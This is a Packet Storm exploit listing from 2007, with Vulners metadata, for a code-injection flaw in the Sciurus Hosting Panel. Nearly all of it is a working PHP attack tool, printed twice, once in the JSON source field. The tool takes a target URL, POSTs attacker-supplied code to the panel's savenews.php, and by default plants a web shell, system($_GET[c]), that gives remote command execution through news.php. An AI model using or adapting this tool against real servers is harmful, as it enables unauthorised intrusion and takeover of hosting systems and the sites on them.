Search...

sciuris-inject.txt

2007-11-26T00:00:00

ID PACKETSTORM:61133
Type packetstorm
Reporter Liz0ziM
Modified 2007-11-26T00:00:00

Description

                                        
                                            `&lt;? ob_implicit_flush(true); ?&gt;  
&lt;style&gt;  
body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}  
input,  
.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}  
button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}  
body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}   
textarea{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}  
a:link {  
color: #999999;  
text-decoration: none;  
font-weight: bold;  
background-color:#000000;  
}  
a:visited {  
color: #999999;  
text-decoration: none;  
font-weight: bold;  
background-color:#000000;  
}  
&lt;/style&gt;&lt;br&gt;  
&lt;center&gt;  
&lt;h3&gt;Sciurus Hosting Panel Code İnject Exploit&lt;/h3&gt;&lt;br&gt;  
Exploit Coded By Liz0ziM From &lt;a href="http://www.biyofrm.com"&gt;BiyoSecurityTeam&lt;/a&gt;&lt;br&gt;  
Greetz My all friend and BiyoSecurityTeam User..  
&lt;br&gt;  
&lt;form method="POST" action=""&gt;  
&lt;input name="adres" type="text" value="Target example: http://www.site.com/" size="70" onFocus="if(this.value=='Target example: http://www.site.com/')this.value=''" onBlur="if(this.value=='')this.value='Target example: http://www.site.com/'"&gt;  
&lt;input name="kodcuk" type="text" value="Evil Code example: &lt;? system($_GET[c]); ?&gt;" size="70" onFocus="if(this.value=='Evil Code example: &lt;? system($_GET[c]); ?&gt;')this.value=''" onBlur="if(this.value=='')this.value='Evil Code example: &lt;? system($_GET[c]); ?&gt;'"&gt;  
&lt;input name="yolla" type="submit" value="Send Evil Code"&gt;  
&lt;/form&gt;  
  
&lt;br&gt;  
&lt;?php  
if($_POST[yolla])  
{  
$adres=$_POST[adres];  
$kodcuk=$_POST[kodcuk];  
if($adres=="" OR $kodcuk=="") { echo 'Boş Yerleri Doldurun'; exit(); }  
echo 'Target= '.htmlspecialchars($adres)."&lt;br&gt;";  
sleep(1);  
echo 'Evil Code= '.htmlspecialchars($kodcuk)."&lt;br&gt;";  
sleep(1);  
echo 'Sending Evil Code.......&lt;br&gt;';  
$paket1=$adres."/acp/savenews.php";  
$paket2="filecontents=".$kodcuk;  
$ch = curl_init();  
  
/* &lt;pre&gt;&lt;b&gt;&lt;? system($_GET[c]); ?&gt;&lt;/b&gt;&lt;/pre&gt; */  
curl_setopt($ch, CURLOPT_URL, $paket1);  
  
curl_setopt ($ch, CURLOPT_POST, 1);  
  
curl_setopt ($ch, CURLOPT_POSTFIELDS, stripslashes($paket2));  
  
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);  
  
$content = curl_exec ($ch);  
curl_close ($ch);   
sleep(5);  
echo "Exploit Has Been Succeful : &lt;a target='_blank' href='".$adres."/includes/news.php'&gt;".$adres."/includes/news.php&lt;/a&gt;";  
}  
?&gt;  
&lt;/center&gt;  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:61133", "type": "packetstorm", "bulletinFamily": "exploit", "title": "sciuris-inject.txt", "description": "", "published": "2007-11-26T00:00:00", "modified": "2007-11-26T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/61133/sciuris-inject.txt.html", "reporter": "Liz0ziM", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:25:20", "viewCount": 1, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:25:20", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:25:20", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/61133/sciuris-inject.txt", "sourceData": "`<? ob_implicit_flush(true); ?> \n<style> \nbody{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;} \ninput, \n.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;} \nbutton{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;} \nbody,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;} \ntextarea{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;} \na:link { \ncolor: #999999; \ntext-decoration: none; \nfont-weight: bold; \nbackground-color:#000000; \n} \na:visited { \ncolor: #999999; \ntext-decoration: none; \nfont-weight: bold; \nbackground-color:#000000; \n} \n</style><br> \n<center> \n<h3>Sciurus Hosting Panel Code \u0130nject Exploit</h3><br> \nExploit Coded By Liz0ziM From <a href=\"http://www.biyofrm.com\">BiyoSecurityTeam</a><br> \nGreetz My all friend and BiyoSecurityTeam User.. \n<br> \n<form method=\"POST\" action=\"\"> \n<input name=\"adres\" type=\"text\" value=\"Target example: http://www.site.com/\" size=\"70\" onFocus=\"if(this.value=='Target example: http://www.site.com/')this.value=''\" onBlur=\"if(this.value=='')this.value='Target example: http://www.site.com/'\"> \n<input name=\"kodcuk\" type=\"text\" value=\"Evil Code example: <? system($_GET[c]); ?>\" size=\"70\" onFocus=\"if(this.value=='Evil Code example: <? system($_GET[c]); ?>')this.value=''\" onBlur=\"if(this.value=='')this.value='Evil Code example: <? system($_GET[c]); ?>'\"> \n<input name=\"yolla\" type=\"submit\" value=\"Send Evil Code\"> \n</form> \n \n<br> \n<?php \nif($_POST[yolla]) \n{ \n$adres=$_POST[adres]; \n$kodcuk=$_POST[kodcuk]; \nif($adres==\"\" OR $kodcuk==\"\") { echo 'Bo\u015f Yerleri Doldurun'; exit(); } \necho 'Target= '.htmlspecialchars($adres).\"<br>\"; \nsleep(1); \necho 'Evil Code= '.htmlspecialchars($kodcuk).\"<br>\"; \nsleep(1); \necho 'Sending Evil Code.......<br>'; \n$paket1=$adres.\"/acp/savenews.php\"; \n$paket2=\"filecontents=\".$kodcuk; \n$ch = curl_init(); \n \n/* <pre><b><? system($_GET[c]); ?></b></pre> */ \ncurl_setopt($ch, CURLOPT_URL, $paket1); \n \ncurl_setopt ($ch, CURLOPT_POST, 1); \n \ncurl_setopt ($ch, CURLOPT_POSTFIELDS, stripslashes($paket2)); \n \ncurl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); \n \n$content = curl_exec ($ch); \ncurl_close ($ch); \nsleep(5); \necho \"Exploit Has Been Succeful : <a target='_blank' href='\".$adres.\"/includes/news.php'>\".$adres.\"/includes/news.php</a>\"; \n} \n?> \n</center> \n`\n", "immutableFields": []}